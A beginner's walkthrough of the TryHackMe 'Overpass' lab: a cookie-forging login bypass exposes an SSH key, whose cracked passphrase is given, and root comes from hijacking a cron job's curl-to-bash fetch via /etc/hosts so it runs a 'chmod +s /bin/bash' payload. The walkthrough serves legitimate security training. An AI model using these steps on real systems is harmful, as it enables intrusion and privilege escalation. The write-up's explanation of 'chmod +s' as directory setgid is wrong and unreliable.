TryHackMe’s Overpass Level1
Boot2Root challenge: Capture the normal and superuser’s flag.
Overpass is the series related to the web application penetration testing and is really beginner’s friendly. It includes basic web vulnerabilities,basic cryptography,password cracking and analyzing the source code.
So lets get started……..
I got the machine’s IP as 10.10.193.124 .
So go with the basic enumeration… → nmap,nikto,etc..
Nmap is the great tool for scanning the machine.Therefore,
I didn’t include ‘-p-’ because these are the only two ports open on the machine.(I already knew this,because i solved it before writing this!)
The interesting thing here is on port 80… the use of GO language. We don’t see this as often.I opened the machine on my browser -> 10.10.193.124 and it shows..
Here i started my manual enumeration.It give the binaries and source code for downloading.
I downloaded linux binary,source code and buildscript and lets analyze and review it.Give the required permission to the binary for running it.
chmod 777 overpassLinux and ./overpassLinux
It seemed like going to devil’s den here by entering different options available, So i started to look into the source code and .sh file.
I got nothing interesting in the overpass.go file but some functions had my mind like rot47function. It clearly states that rot47 is used somewhere!!
buildscript.sh gives and idea that a command is running with root privs and somehow i need to get in b/w as mitm.
Now after some break, i started searching for hidden directories and file manually and with automation tools like dirbuster.
#Always check the source code using ‘ctrl+u’ and check for hidden data or sensitive info in HTML comments.
Here I found some hidden directories through manual and automated enumeration.
Admin.html and login.js seems interesting to me and lets start looking into them.
Admin.html seems intersting , i tried sqli, bruteforcing,etc but nothing worked but i learnt alot about hydra the online bruteforcer.
I go for a hint which says: Owasp Top 10 and do not bruteforce.
I immediately checked for owasp top 10 and started reviewing the login.js file.
login() functions seems attractive and had a flaw in it.
In the line where we check the ‘statusorCookie’ parameter,it is setting the parameter “SessionToken” to anything in the else part but nothing in particular.
What if we ourselves set the parameter.!?
Yeah, I can set it to anything!! Therefore on refreshing the page I got the Private RSA key of the user James!!!!
It is the ssh key.
Now i need to retrieve the password using this key.
John:The ripper is one of the best tool for cracking passwords.
But the format of file “rsakey” is not acceptable by the john, so it is required to change the format.
John has inbuilt script for changing the format of file in /usr/share/john named ssh2john.py .
Now i can crack the key to get the password.
I used the inbuilt file in /usr/share/wordlists, rockyou.txt as the parameter for wordlist parameter of john.
I was able to crack the password and now ready to ssh into the machine.
So i ssh’ed in to the machine using this key.
Copy this key to file “rsakey” adn go for the following command.
ssh -i rsakey james@10.10.193.124 and entered ‘james13' as passphrase.
I got the regular user flag in user.txt .
I also ‘cat’ out todo.txt for futher steps like priv esc.
The phrase “automated build script working and where the builds go” is interesting as i got idea of finding the automated scripts that are working on their own.
From my nmap results i got to know that it is linux based machine and it time to enumerate it.
So i googled, how to enumerate the linux machine from inside it!! and read some other writeups and came accross “linpeas.sh” file.
So its time to upload it to the machine.
ssh is used for file sharing but how? Need to google it too!!!
I came accorss the command:
scp fileinursystem user@host:/path/to/whereyouwant/thefile
And i also have the key.Therefore,
Now start the enumeration.
./linpeas.sh
While going through the result of the linpeas i came accross some wonderful facts about the machine like
Now this seems interesting, as CRON is managing this ‘curl’ command and piping it to the /bin/bash.
overpass.thm seems like a domain as i have knowledge about the active directories.
Going further i came accross the writeable contents which includes /etc/hosts, which is mainly, can be written by root user.
Since curl is used by root so if we somehow exploit it we can get the root access.The curl command from cronjob is using a “overpass.thm” as the hostname and we have write access to the hosts file.
So what if we edit the /etc/hosts file and change the ip for overpass.thm with our ip as follows:
Meaning we can replace the hostname to make the cronjob think that the hostname is from our IP Address which will let it connect to our given IP address.
as curl is working on (domain)/downloads/src/buildscript.sh i made the same setup in my machine.
now what is included in buildscript.sh????
#!/bin/bash
chmod +s /bin/bash
It means:
This command sets the “set group ID” (setgid) mode bit on the current directory . This means that all new files and subdirectories created within the current directory inherit the group ID of the directory, rather than the primary group ID of the user who created the file.
Therefore i need to host a server to recieve a request. Host server on the root of the “downloads” folder and started to watch the /bin/bash.
When curl makes the connection, setgid changes as shown!
Now stop watching /bin/bash
and go for /bin/bash -p to get the shell. and now you are root-user!!!
Submit both the flags.
Remember you should know how to solve all the problems which have already been solved.
